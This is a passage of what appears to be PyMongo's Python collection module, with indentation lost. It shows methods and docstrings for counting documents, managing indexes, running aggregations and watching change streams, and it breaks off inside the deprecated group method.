"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existant collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existant collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
